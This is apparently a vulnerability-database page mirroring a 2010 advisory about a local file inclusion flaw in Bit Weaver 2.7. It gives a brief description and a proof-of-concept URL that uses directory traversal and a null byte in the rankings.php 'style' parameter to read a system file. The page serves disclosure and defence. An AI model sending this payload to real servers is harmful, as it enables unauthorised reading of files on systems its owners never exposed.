Bit Weaver 2.7 local file inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050500 漏洞类型
发布时间 2010-07-02 更新时间 2010-07-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010070008
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
------------------------------------------------------------------------
Software................Bit Weaver 2.7
Vulnerability...........Local File Inclusion
Download................http://www.bitweaver.org/
Release Date............7/1/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A local file inclusion vulnerability in Bit Weaver 2.7 can be
exploited to include arbitrary files.


--PoC--

http://localhost//bitweaver/wiki/rankings.php?style=../../../../../../../../windows/system.ini%00